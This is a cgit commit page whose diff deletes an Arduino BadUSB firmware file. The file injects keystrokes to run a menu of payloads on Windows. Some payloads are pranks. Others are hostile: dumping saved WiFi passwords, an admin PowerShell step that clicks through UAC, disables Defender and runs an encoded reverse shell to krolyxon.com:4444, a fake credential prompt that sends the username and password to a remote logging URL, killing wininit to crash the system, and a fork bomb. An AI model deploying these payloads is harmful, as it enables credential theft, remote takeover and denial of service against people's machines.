aboutsummaryrefslogtreecommitdiff
path: root/src/hid/badusb.cpp
diff options
context:
space:
mode:
authorkrolyxon <me@krolyxon.com>2026-06-20 00:24:34 +0530
committerkrolyxon <me@krolyxon.com>2026-06-20 00:24:34 +0530
commit7e4cfad53699fabbecb6696508e5addcffc1b095 (patch)
treeebff581b0989df578c312247e1dad514c956572b /src/hid/badusb.cpp
parent1f800b74329d4f8b1511b4cf2a0d031439e1038d (diff)
restructure to use rust source tree primarily
Diffstat (limited to 'src/hid/badusb.cpp')
-rw-r--r--src/hid/badusb.cpp446
1 files changed, 0 insertions, 446 deletions
diff --git a/src/hid/badusb.cpp b/src/hid/badusb.cpp
deleted file mode 100644
index c24f541..0000000
--- a/src/hid/badusb.cpp
+++ /dev/null
@@ -1,446 +0,0 @@
-#include "ui/display.h"
-#include <Arduino.h>
-#include <USBHIDKeyboard.h>
-
-extern USBHIDKeyboard Keyboard;
-
-void runCommand(const char *command) {
- Keyboard.press(KEY_LEFT_GUI);
- Keyboard.press('r');
- delay(100);
- Keyboard.releaseAll();
- delay(300);
- Keyboard.print(command);
- Keyboard.write(KEY_RETURN);
-}
-
-void showRunningScreen(String taskName, uint8_t duration = 5) {
- u8g2.clearBuffer();
- u8g2.setFont(u8g2_font_6x12_tf);
- u8g2.drawStr(0, 15, "Running:");
- u8g2.drawStr(0, 30, taskName.c_str());
- u8g2.drawFrame(0, 45, 128, 10);
-
- static const unsigned char image_download_bits[] U8X8_PROGMEM = {
- 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x80, 0x1f, 0x00, 0x00,
- 0x00, 0x80, 0xff, 0x1f, 0x00, 0x00, 0x00, 0x80, 0xff, 0x1f, 0x00, 0x00,
- 0x00, 0x60, 0x80, 0x1f, 0x00, 0x00, 0x00, 0x60, 0x00, 0x0f, 0x00, 0x00,
- 0x00, 0x18, 0x00, 0x00, 0x00, 0x00, 0x00, 0x18, 0x00, 0x00, 0x00, 0x02,
- 0x00, 0x06, 0x00, 0x00, 0x00, 0x0e, 0x00, 0x06, 0x00, 0x00, 0x00, 0x3e,
- 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
- 0x00, 0x60, 0x00, 0x00, 0x00, 0x3e, 0x00, 0x60, 0x00, 0x00, 0x00, 0x0e,
- 0x00, 0x80, 0x01, 0x00, 0x00, 0x02, 0x00, 0x80, 0x01, 0x00, 0x00, 0x00,
- 0x00, 0x00, 0x06, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x06, 0xf0, 0x03, 0x00,
- 0x00, 0x00, 0xf8, 0xff, 0x03, 0x00, 0x00, 0x00, 0xf8, 0xff, 0x03, 0x00,
- 0x00, 0x00, 0x00, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x00, 0xf0, 0x03, 0x00};
- static const unsigned char image_EviSmile1_bits[] U8X8_PROGMEM = {
- 0x0c, 0xc0, 0x00, 0x06, 0x80, 0x01, 0x07, 0x80, 0x03, 0xcf, 0xcf,
- 0x03, 0xff, 0xff, 0x03, 0xff, 0xff, 0x03, 0xfe, 0xff, 0x01, 0xfe,
- 0xff, 0x01, 0xfe, 0xff, 0x01, 0xf7, 0xbf, 0x03, 0xe7, 0x9f, 0x03,
- 0xc7, 0x8f, 0x03, 0x87, 0x87, 0x03, 0x8f, 0xc7, 0x03, 0xff, 0xff,
- 0x03, 0xfe, 0xff, 0x01, 0xde, 0xef, 0x01, 0xbc, 0xf4, 0x00, 0x78,
- 0x78, 0x00, 0xf0, 0x3f, 0x00, 0xc0, 0x0f, 0x00};
-
- u8g2.setFontMode(1);
- u8g2.setBitmapMode(1);
- // download
- u8g2.drawXBMP(80, 2, 48, 22, image_download_bits);
-
- // EviSmile1
- u8g2.drawXBMP(62, 1, 18, 21, image_EviSmile1_bits);
-
- for (uint8_t i = 0; i <= duration; i++) {
- u8g2.drawBox(1, 46, i * (126.0 / duration), 8);
- u8g2.sendBuffer();
- delay(50);
- }
-}
-
-void typeSlow(const char *text, int delayMs = 25) {
- while (*text) {
- Keyboard.print(*text);
- delay(delayMs);
- text++;
- }
-}
-
-void badUSBMenu(int index) {
- // switch (index)
- // {
- // case 0:
- // runBadUSBDemo();
- // break;
-
- // case 1:
- // Serial.println("Open CMD payload");
- // runBadUSBOpenCMD();
- // break;
-
- // case 2:
- // Serial.println("Rickroll payload");
- // runBadUSBRickroll();
- // break;
- // }
-
- switch (index) {
- // ================= ORION DEMO =================
- case 0:
- showRunningScreen("ORION Demo");
-
- runCommand("notepad");
-
- delay(2500);
-
- typeSlow(" ____ _____ _____ ___ ___ _ _ ____ _____ ");
- Keyboard.write(KEY_RETURN);
-
- typeSlow(" / __ \\| __ \\|_ _|_ _/ _ \\| \\ | | | _ \\| ___|");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("| | | | |__) | | | | | | | | \\| |_____| |_) | |_ ");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("| | | | _ / | | | | | | | . ` |_____| _ <| _| ");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("| |__| | | \\ \\ _| |_ | | |_| | |\\ | | |_) | | ");
- Keyboard.write(KEY_RETURN);
-
- typeSlow(" \\____/|_| \\_\\_____|___\\___/|_| \\_| |____/|_| ");
- Keyboard.write(KEY_RETURN);
-
- Keyboard.write(KEY_RETURN);
-
- typeSlow("[+] WIFI MODULE READY");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("[+] BLE MODULE READY");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("[+] SUBGHZ MODULE READY");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("[+] NFC MODULE READY");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("[+] HID ENGINE READY");
- Keyboard.write(KEY_RETURN);
-
- break;
-
- // ================= RICKROLL =================
- case 1:
- showRunningScreen("RickRoll");
-
- runCommand("cmd");
-
- delay(700);
-
- typeSlow("start https://www.youtube.com/watch?v=dQw4w9WgXcQ");
- Keyboard.write(KEY_RETURN);
-
- break;
-
- // ================= MATRIX =================
- case 2:
- showRunningScreen("Matrix");
-
- runCommand("cmd");
-
- delay(700);
-
- typeSlow("color 0A");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("mode con: cols=120 lines=40");
- Keyboard.write(KEY_RETURN);
-
- typeSlow(":A");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("echo %random%%random%%random%%random%%random%");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("goto A");
- Keyboard.write(KEY_RETURN);
-
- break;
-
- // ================= FAKE TERMINAL =================
- case 3:
- showRunningScreen("Fake Terminal");
-
- runCommand("cmd");
-
- delay(700);
-
- typeSlow("color 0A");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("cls");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("echo CONNECTING TO TARGET...");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("echo BYPASSING FIREWALL...");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("echo ACCESS GRANTED");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("systeminfo");
- Keyboard.write(KEY_RETURN);
-
- break;
-
- // ================= WIFI CRACK =================
- // ================= WIFI PASSWORD RECOVERY =================
- case 4:
- showRunningScreen("WiFi Recovery");
-
- runCommand("cmd");
- delay(700);
-
- // Styling the window
- typeSlow("color 0A && mode con: cols=100 lines=30");
- Keyboard.write(KEY_RETURN);
- delay(200);
-
- typeSlow("echo [!] EXTRACTING SAVED WIFI PROFILES...");
- Keyboard.write(KEY_RETURN);
- delay(500);
-
- // The "Magic" Command:
- // This lists all profiles and shows the 'Key Content' (the password) in
- // clear text. We use a 'for' loop to automate this for every network
- // the PC has ever joined.
- typeSlow(
- "for /f \"tokens=4,*\" %i in ('netsh wlan show profiles ^| findstr "
- "/C:\"All User Profile\"') do netsh wlan show profile name=\"%j\" "
- "key=clear | findstr /C:\"Key Content\" /C:\"SSID name\"");
-
- Keyboard.write(KEY_RETURN);
-
- // Optional: Keep the window open to read the results
- typeSlow("echo. && echo [COMPLETE] Passwords listed above.");
- Keyboard.write(KEY_RETURN);
-
- break;
-
- // ================= FAKE UPDATE =================
- case 5:
- showRunningScreen("Fake Update");
-
- runCommand("cmd");
-
- delay(700);
-
- typeSlow("start https://fakeupdate.net/win10u/");
- Keyboard.write(KEY_RETURN);
-
- break;
-
- // ================= FAKE BSOD =================
- case 6:
- showRunningScreen("Critical Error");
-
- runCommand("powershell -c \"stop-process -name wininit -force\"");
- break;
-
- // ================= GLITCH SCREEN =================
- case 7:
- showRunningScreen("Glitch");
-
- runCommand("cmd");
-
- delay(700);
-
- for (int i = 0; i < 20; i++) {
- typeSlow("color 4F");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("color 1F");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("cls");
- Keyboard.write(KEY_RETURN);
- }
-
- break;
-
- // ================= ASCII SPAM =================
- case 8:
- showRunningScreen("ASCII");
-
- runCommand("notepad");
-
- delay(2000);
-
- for (int i = 0; i < 15; i++) {
- typeSlow("######### ORION-RF #########");
- Keyboard.write(KEY_RETURN);
-
- typeSlow(">>> SIGNAL ACQUIRED <<<");
- Keyboard.write(KEY_RETURN);
-
- typeSlow("[|||||||||||||||||||||||||]");
- Keyboard.write(KEY_RETURN);
-
- Keyboard.write(KEY_RETURN);
- }
-
- break;
-
- // ================= HACKER TYPER =================
- case 9:
- showRunningScreen("Hacker Typer");
-
- runCommand("cmd");
-
- delay(700);
-
- typeSlow("start https://hackertyper.net/");
- Keyboard.write(KEY_RETURN);
-
- break;
- // ================= POWERSHELL REVERSE SHELL =================
- // ================= DEFENDER BYPASS + NC =================
- case 10:
- showRunningScreen("Pwn Mode v2");
-
- // 1. Open Admin PowerShell
- Keyboard.press(KEY_LEFT_GUI);
- Keyboard.press('r');
- delay(150);
- Keyboard.releaseAll();
- delay(500);
-
- // Open Admin Prompt - using 'powershell' directly to save space
- typeSlow("powershell Start-Process powershell -Verb runAs");
- Keyboard.write(KEY_RETURN);
- delay(2500); // Wait for UAC
-
- // 2. Bypass UAC (Left Arrow + Enter)
- Keyboard.write(KEY_LEFT_ARROW);
- delay(200);
- Keyboard.write(KEY_RETURN);
- delay(3000); // Give the Admin window time to load
-
- // 3. AMSI Bypass + Disable Defender + Execute Shell
- // We use -EncodedCommand to hide the script from simple string
- // scanners. The Base64 string below contains: Set-MpPreference
- // -DisableRealtimeMonitoring $true; [Reverse Shell Logic]
-
- typeSlow("powershell -ExecutionPolicy Bypass -WindowStyle Hidden "
- "-EncodedCommand ");
-
- // This is the encoded payload for krolyxon.com:4444
- typeSlow("JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5A"
- "FMAdAByAG"
- "UAYQBtACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA"
- "2ADQAUwB0"
- "AHIAaQBuAGcAKAAiAEgA"
- "NABDAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkA"
- "cwB0AGUAb"
- "QAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAFQAbABpAGUAbgB0AC"
- "gAJwBrAHI"
- "AbwBsAHkAeABvAG4A"
- "LgBjAG8AbQAnACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkA"
- "GMAbABpAG"
- "UAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQB"
- "dACQAYgB5"
- "AHQAZQBzACAAPQA"
- "gADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQA"
- "aQAgAD0AI"
- "AAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwAC"
- "wAIAAkAGI"
- "AeQB0AGUAcwAuAEw"
- "AZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9"
- "ACAAKABOA"
- "GUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcw"
- "B0AGUAbQA"
- "uAFQAZQB4AHQAL"
- "gBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG"
- "4AZwAoACQ"
- "AYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAg"
- "AD0AIAAoA"
- "GkAZQB4ACAAJAB"
- "kAGEAdABhACAAMgA+"
- "ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZ"
- "ABiAGEAYw"
- "BrADIAIAAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwA"
- "gACsAK"
- "ABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAG"
- "IAeQB0AGU"
- "AIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBT"
- "AEMASQBJA"
- "CkALgBHAGUAd"
- "ABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAG"
- "UAYQBhAG0"
- "ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBu"
- "AGQAYgB5A"
- "HQAZQAuAEwAZQB"
- "uAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsA"
- "JABjAGwAa"
- "WVudAAuAEMAbABvAHMAZQAoACkAIgApACkAOwBJAG4AdgBvAGsAZQAtAEUAeA"
- "BwAHIAZQB"
- "zAHMAaQBvAG4AIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMA"
- "bwBkAGkAb"
- "gBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAGuAZwAoACQAcwAuAF"
- "QAbwBBAHI"
- "AcgBhAHkAKAApACkAKQA=");
-
- Keyboard.write(KEY_RETURN);
- break;
- // ================= CREDENTIAL SNATCHER =================
- case 11:
- showRunningScreen("Vault Crack");
-
- // Open hidden PowerShell
- runCommand(
- "powershell -nop -W Hidden -c \"$cred = "
- "$host.ui.PromptForCredential('Windows Security','Please "
- "authenticate "
- "to update your system credentials.','',''); $p = "
- "$cred.GetNetworkCredential().Password; $u = $cred.UserName; "
- "Invoke-WebRequest -Uri "
- "'http://krolyxon.com/log?u='+$u+'&p='+$p\"");
-
- break;
- // ================= DESKTOP GHOST =================
- case 12:
- showRunningScreen("Ghost Mode");
-
- runCommand(
- "powershell -nop -W Hidden -c \"Add-Type -AssemblyName "
- "System.Windows.Forms; "
- "[System.Windows.Forms.SendKeys]::SendWait('{PRTSC}'); "
- "Start-Sleep -s 1; $path = '$env:TEMP\\bg.png'; (Get-Clipboard "
- "-Format Image).Save($path); Set-ItemProperty -Path "
- "'HKCU:\\Control Panel\\Desktop' -Name Wallpaper -Value $path; "
- "rundll32.exe user32.dll,UpdatePerUserSystemParameters;\"");
-
- // Hide Desktop Icons (requires a registry tweak)
- typeSlow(
- "reg add "
- "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Adv"
- "anced /v HideIcons /t REG_DWORD /d 1 /f && taskkill /f /im "
- "explorer.exe && start explorer.exe");
- Keyboard.write(KEY_RETURN);
-
- break;
- // ================= FORK BOMB =================
- case 13:
- showRunningScreen("System Stress");
-
- runCommand("cmd");
- delay(500);
-
- // The shortest deadly command in Windows
- typeSlow("%0|%0");
- Keyboard.write(KEY_RETURN);
-
- break;
- }
-}
generated by cgit v1.2.3 (git 2.46.0) at 2026-06-30 03:59:26 +0000